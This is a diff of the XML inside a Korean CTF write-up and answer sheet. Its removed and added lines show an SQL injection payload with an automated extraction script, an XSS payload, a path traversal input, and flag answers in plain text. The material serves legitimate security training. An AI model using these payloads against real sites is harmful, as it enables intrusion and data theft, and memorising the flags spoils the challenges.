-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>blind-notice</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>reflected-board</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -987,22 +1775,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Boolean Blind SQL Injection / 중급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>DOM XSS / 초급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1010,22 +1818,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>250</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>180</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1033,27 +1861,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>검색 결과 존재 여부만 이용해 비공개 메모의 FLAG를 한 글자씩 추출한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{dom_xss_reflected_search_alert}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>검색 결과 영역에서 alert() 호출을 발생시킨다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1065,33 +1926,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>검색어가 SQL LIKE 조건에 직접 이어 붙는 구조임을 확인한다.</w:t>
+        <w:t>검색어가 결과 영역에 그대로 반사되는지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>%' OR 1=1 --  같은 입력으로 참 조건을 만들면 결과가 존재한다고 표시된다.</w:t>
+        <w:t>&lt;b&gt;test&lt;/b&gt;를 입력해 HTML 해석 여부를 본다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>SUBSTR(body,위치,1) 조건을 이용해 FLAG의 각 글자를 참/거짓으로 판별한다.</w:t>
+        <w:t>script 태그 대신 자동 실행 이벤트를 가진 태그를 사용한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>반복 요청이 많으므로 간단한 스크립트로 자동화한다.</w:t>
+        <w:t>alert() 호출이 감지되면 FLAG가 표시된다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1099,20 +1964,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">%' OR SUBSTR(body,1,5)='FLAG{' -- </w:t>
+        <w:t>&lt;img src=x onerror="alert(1)"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1120,111 +1986,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>자동화 예시</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>alert 안의 문자열은 중요하지 않고 함수 호출 자체가 조건이다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>import requests</w:t>
-        <w:br/>
-        <w:t>url = "http://100.83.178.9/challenges/blind-notice.php"</w:t>
-        <w:br/>
-        <w:t>chars = "FLAG{}_abcdefghijklmnopqrstuvwxyz0123456789"</w:t>
-        <w:br/>
-        <w:t>flag = ""</w:t>
-        <w:br/>
-        <w:t>for pos in range(1, 80):</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    for ch in chars:</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        payload = f"%' OR SUBSTR(body,{pos},1)='{ch}' -- "</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        r = requests.get(url, params={"q": payload})</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        if "조건에 맞는 공지가 존재합니다" in r.text:</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">            flag += ch</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">            print(flag)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">            break</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    if flag.endswith("}"):</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        break</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>정답</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{boolean_blind_notice_42c7}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 값을 직접 출력하지 못해도 화면 반응 차이가 있으면 데이터 추출이 가능하다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>3. 반사 게시판 검색</w:t>
+        <w:t>3. 영상 보급창</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>reflected-board</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>image-vault</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1232,22 +2069,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>DOM XSS / 중급 입문</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Path Traversal / 중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1255,22 +2112,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>225</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>260</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1278,27 +2155,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>검색 결과가 innerHTML로 렌더링되는 점을 이용해 alert()를 실행한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{Iz10MXMwOSZrMjBlb2M}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>파일명 필터와 실제 경로 해석 차이로 flag.txt를 읽는다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1310,33 +2220,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>검색창에 일반 문자열을 넣어 결과 영역에 그대로 반사되는지 확인한다.</w:t>
+        <w:t>보급창 색인에서 cover.png와 allowed.png/를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;b&gt;test&lt;/b&gt; 같은 태그를 넣어 HTML로 해석되는지 확인한다.</w:t>
+        <w:t>필터가 .png 포함 여부만 검사한다는 점을 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>script 태그 대신 이미지 오류 이벤트처럼 자동 실행되는 이벤트 핸들러를 사용한다.</w:t>
+        <w:t>allowed.png/ 디렉터리에서 ../로 한 단계 빠져나온다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>alert()가 호출되면 페이지가 FLAG를 표시한다.</w:t>
+        <w:t>최종 경로가 flag.txt를 가리키게 만든다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1344,20 +2258,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>&lt;img src=x onerror="alert(1)"&gt;</w:t>
+        <w:t>allowed.png/../flag.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1365,64 +2280,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>allowed.png는 파일이 아니라 디렉터리 단서다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{dom_xss_reflected_search_alert}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: pwned 같은 문자열은 정답 단서가 아니며 alert 함수 호출 여부만 중요하다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>4. 영상 보급창</w:t>
+        <w:t>4. 코인 제국 보급 작전</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>image-vault</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>idle-empire</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1430,22 +2363,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Path Traversal / 상급 입문</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Client Trust / 중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1453,22 +2406,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>300</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>260</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1476,27 +2449,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>파일명 필터가 .png 포함 여부만 검사하는 점을 이용해 내부 flag 파일을 읽는다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{idle_empire_client_trust_bypass}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>클라이언트 저장소 또는 최종 보고 요청 값을 조작한다.</w:t>
+      </w:r>
+    </w:p>
